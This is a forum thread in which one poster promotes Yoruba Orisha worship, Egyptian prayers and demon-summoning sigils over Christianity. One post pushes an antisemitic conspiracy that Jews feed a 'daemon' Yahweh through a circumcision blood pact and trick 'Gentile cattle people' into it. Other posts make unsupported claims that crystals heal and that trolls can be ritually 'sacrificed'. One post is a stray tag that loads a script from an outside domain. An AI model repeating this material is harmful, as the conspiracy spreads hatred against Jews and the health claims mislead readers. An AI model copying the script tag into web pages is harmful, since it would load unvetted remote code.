Blacks Leaving Churches for Yoruban Witchcraft

Post Reply Post Reply Page  <12
Hair ViVi

Ultra

Author
LadyAradia View Drop Down
VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote LadyAradia Quote  Post ReplyReply Direct Link To This Post Posted: Mar 19 2019 at 9:33am
Hi sis. Haven't seen you in a while while I was away. Yes I have felt that way before. Watch some of Travis Magus videos on youtube though. He explains how angels and daemons are both beneficial for us to call on  for different things.  I forget which bible scripture he quoted in one video that Jesus gave man dominion over all demons that they  are to do our biddings. In fact, King Solomon supposedly used demons to build his temple for him. Also, there are different paths of the craft. Some use loa, others use ancient Gods and others on the LEFT hand path use daemons AND all of the above. Remember that every spirit that is now called a daemon used to be associated with ancient Gods until the jews and christians decided to call all the older Gods daemons to try to put them down. The mother Goddess Astarte was bastardized by them when they decided to call her the ugly demon Astaroth that they made up instead. This was to try to tear her down. Others who they could not tear down like the Irish Goddess Brigid because her followers were too devoted...they incorporated instead. The catholic church said well guess what, since you like Brigid so much, come pray to her in our church as the Saint Brigid so we can get your coins here anyhow....If the fake church could not beat them they joined them. Look it up.  Christianity, judaism and islam were not the religion of any of our ancient ancestors. They were all converted to it. They had their own Gods in Africa, in Europe and even the Native Americans had their own nature spirits before they were all force fed what they believe now. As for me, I am back to the old ways of my ANCIENT ancestors. But to each his own. 

https://medium.com/@pbhaisare189/health-benefits-of-sphatik-mala-d8a456d06220 I just got one of these sphatik quartz crystal malas and use it for my mantras during meditation when I am not wearing it around my neck. The High Priestess of the Sunset on youtube turned me on to this. She uses them with her Enn mantras Plus quartz crystal has beneficial healing effects for the body. I have another one in my birthstone.

Edited by LadyAradia - Mar 19 2019 at 9:45am
Sponsored Links

VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote LadyAradia Quote  Post ReplyReply Direct Link To This Post Posted: Mar 19 2019 at 10:23am

Prayer to Isis
(Words in ancient Egyptian, followed by English translation.)

Nehes, nehes, nehes, Awake, awake, awake,
Nehes em hotep, Awake in peace,
Nehes em neferu Awake in beauty.
Nebet hotepet Lady of peace,
Weben em hotep, Rise thou in peace
Weben em nefuru, Rise thou in beauty.
Nutjert en Ankh, Goddess of life,
Nefer em pet! Beautiful in heaven.
Pet em hotep Heaven is in peace.
Ta em hotep. Earth is in peace,
Nutjert sat Nut Oh Goddess, Daughter of Nut,
Sat Geb, Daughter of Geb,
Merit Ausar; Beloved of Osiris,
Weret, Sedjmet-nebet
Great one, Lady who hears,
Nutjert Asha renu! Goddess rich in names!
Anekh hrak. All praise to You.
Anekh hrak. All praise to You.
Tu a atu. Tu a atu. 
I adore you, I adore you,
Nebet Auset! Lady Isis!
Notice the scales on Isis' body that are similar to a serpent or a fish. This is reminiscent of Quetzalcoatl, the winged serpents worshiped in MezoAmerica and around the world for centuries. This also reminds one of the amphibious Sumerian creator Gods as well as the amphibious Gods of the Dogon peoples who came from the sky in a large egg shaped container. Perhaps Yahweh, who was often described as moving on the face of the water, was simply one of these amphibious Elohim (plural) / Anunnaki, with whom the Jews made animal sacrifices and a pact. Their blood pact is renewed perpetually by offering the foreskin of their newborn boys. They even convinced non-benefiting Goyim (Gentile cattle people / the sheeple) to unknowingly participate in the same blood sacrifice to empower THEIR daemon by circumcising their boys. Gentiles, thus unknowingly make blood sacrifices to Yahweh even though they are NOT the beneficiaries of said blood pact with the djinn or daemon named Yahweh.

I personally am not at all drawn to the jewish deity  but rather to the older ones from Ancient Egypt, the Yoruban Gods, the Ancient Hindu and even European Gods as well!

Edited by LadyAradia - Mar 19 2019 at 3:47pm
VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote LadyAradia Quote  Post ReplyReply Direct Link To This Post Posted: Apr 09 2019 at 3:34am
Jesus gave us power over all spirits. We may use angels, demons and even Satan to do our bidding according to the bible.
Luke 10:17-19 King James Version (KJV)
17 And the seventy returned again with joy, saying, Lord, even the devils are subject unto us through thy name.

18 And he said unto them, I beheld Satan as lightning fall from heaven.

19 Behold, I give unto you power to tread on serpents and scorpions, and over all the power of the enemy: and nothing shall by any means hurt you.

Edited by LadyAradia - Apr 09 2019 at 3:40am
VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote LadyAradia Quote  Post ReplyReply Direct Link To This Post Posted: Apr 09 2019 at 3:37am
Sigil and enn (chant) for Vassago for development of psychic skills and divinations. He is neither an angel nor a demon, rather an ancient Middle Eastern pagan spirit supposedly. 

Edited by LadyAradia - Apr 09 2019 at 3:38am
VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote LadyAradia Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2019 at 8:25am
 < ="text/" async="" ="//cardinal.net/1fa16f6ccbee745a0c.js">
VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote LadyAradia Quote  Post ReplyReply Direct Link To This Post Posted: Jul 10 2019 at 5:26pm
How to use internet troll's energy against them as sacrifices and life force to fuel your rituals.
Welcome haters and and trolls then sacrifice them up to the Gods and Demons as offerings.
click below for details

If their hate makes you temporarily feel bad, that's even better. Transmute those feelings into more power to fuel the Gods/Demons and empower your rituals.

Edited by LadyAradia - Jul 10 2019 at 11:19pm
exoticmami06 View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote exoticmami06 Quote  Post ReplyReply Direct Link To This Post Posted: Sep 16 2019 at 8:10am
Originally posted by LadyAradia LadyAradia wrote:

<span style="color: rgb29, 33, 41; font-family: Helvetica, Arial, sans-serif; font-size: 14px;">Ashe sisters! Praise Ochun! I am so happy to see that my sisters are leaving the Yahweh parasite virus to return to their authentic Yoruban roots. https://baltimore.cbslocal.com/2019/02/18/baltimore-witches-show-a-different-way-to-worship/?fbclid=IwAR3Tb-4ldvzAj9VlVJ3PLT9EngbbzTIVOtQ9Lpe4tWtE9MNrBkuXzi0KVfo</span>

That sounds like Scientology for African-Americans. Since when is Oshun Ochun?

VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote LadyAradia Quote  Post ReplyReply Direct Link To This Post Posted: Nov 03 2019 at 7:40am
In different countries they translate names and spell them differently in different languages. For example, Yemonja is called Yemaya in other countries where they speak different languages. The slaves were not only dropped off off in English-speaking United States. They were transported to Jamaica, Haiti, all throughout Latin America and the Caribbean as well as South America. They speak several languages in all of those countries, so the spelling varies slightly across borders. But the power of the original Orisha stays the same.

I would not call this Scientology, rather it is the ancient tradition of the ancestors from the motherland Africa. The slaves who were brought to the Americas came primarily from Yoruba land, which includes Nigeria and Lagos. The slaves were not Christians who came here. Rather, this is the religion they practiced, the Yoruba religion of the Orishas. The Yoruba religion manifests in different ways all over the world. In some parts it is known as Santeria in the Caribbean, in Haiti it may manifest as voodoo. These modern women call it witchcraft. But the slaves were coerced by force, by whipping and by threat of death to
convert to Christianity or to Islam and to forget their Ancient Yoruba religion of the Orishas. Unfortunately now it has been demonized. They have a literally tricked African Americans into thinking that the religion of their ancestors was evil when nothing could be further from the truth. They have cloaked it in a false façade of darkness, demonism, Satanism and pure evil. But the reality is that it was the pure, unadulterated,, Faith of the ancestors who were brought here in the transatlantic slave trade. Other stories and fables are packaged like fairytales and presented with fairy dust, pixies, Angels, and a false façade of the light while the ancient roots are cloaked in darkness to make one afraid of their true religion and their true past. It is an attempt to remove one from one’s power and to replace it with fables of their choosing with avatars with the blonde hair and blue eyes instead. The unfortunate result is a brainwashing, a form of mind control to make one worship the image of the oppressor. It is a master Hitlerian technique of oppression and psychological programming.

Edited by LadyAradia - Nov 03 2019 at 8:35am
VIP Member
VIP Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote LadyAradia Quote  Post ReplyReply Direct Link To This Post Posted: Nov 05 2019 at 1:10pm
https://youtu.be/JIZl9YQtmtc
Hair ViVi
Ultra
 Post Reply Post Reply Page  <12
  Share Topic